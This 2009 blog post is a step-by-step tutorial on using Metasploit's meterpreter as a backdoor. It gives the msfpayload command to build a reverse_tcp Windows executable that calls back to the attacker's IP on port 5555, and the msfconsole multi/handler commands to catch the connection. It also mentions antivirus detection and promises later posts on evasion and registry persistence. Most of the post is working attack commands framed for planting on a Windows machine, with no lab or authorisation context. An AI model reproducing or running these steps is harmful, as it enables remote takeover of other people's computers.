Tuesday, March 24, 2009

Meterpreter as a backdoor

After finding THIS video on using meterpreter as a backdoor, I knew I had to make a post about it. I had been trying for a few days to get meterpreter to work as a backdoor, and I hadn't had much luck. This video tutorial was the answer to my prayers.

Now, I had to watch the video a few times because it was a tad bit confusing (unless you pay close attention). I'm hoping this little walk-through will make it clearer and easier to understand.

Step 1: Issue the command:
./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=5555 X > metexe.exe
(TIP: You must first be in your Metasploit Framework folder)

(Warning: metexe.exe will be detected by some antiviruses - tested with Antivir)

Let me explain what this all does, first of all, "./msfpayload" is the application we are going to run. "windows/meterpreter/reverse_tcp" is the payload we want made into a windows binary. "LHOST=" is a variable holding our (the attacker) IP address. "LPORT=5555" is a variable telling what port to connect back to. "X" (near the end of the command) instructs msfpayload to make it into a windows binary. Finally, "> metexe.exe" tells msfpayload where to save the file.

If you did everything correctly, you should now have a file named metexe.exe in the same directory that msfpayload is in (/pentest/exploits/framework3/, for example).

This is only half the battle, unfortunately. Sure this will connect back to us, but we don't have anything running on our attacker machine to accept the incoming connection. Let's fix this little problem.

Step 2: Start ./msfconsole

Step 3: Type these commands...

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 5555

(TIP: Be sure to change to your IP address)

You will notice that this won't actually exploit anything, it will simply create a listener to accept the meterpreter connection. Try putting metexe.exe onto a windows machine (I don't think it works on Vista, yet) and launch it. If all goes smoothly, your listener should tell you that it just received a connection.

I'm planning on making three more posts related to Meterpreter in the near future. One on how antiviruses react to the compiled payload (metexe.exe), the second one on how to actually use meterpreter, and the third on how to get meterpreter to run on startup using registry keys. Please note that the future posts are in no particular order and an ETA is not currently available.

Again, if you have any questions, comments, or concerns, please email me at nulbytesecurity [-@-] gmail.com.

1 comment:

  1. gr8 !!! work man.....simple terms used and explained well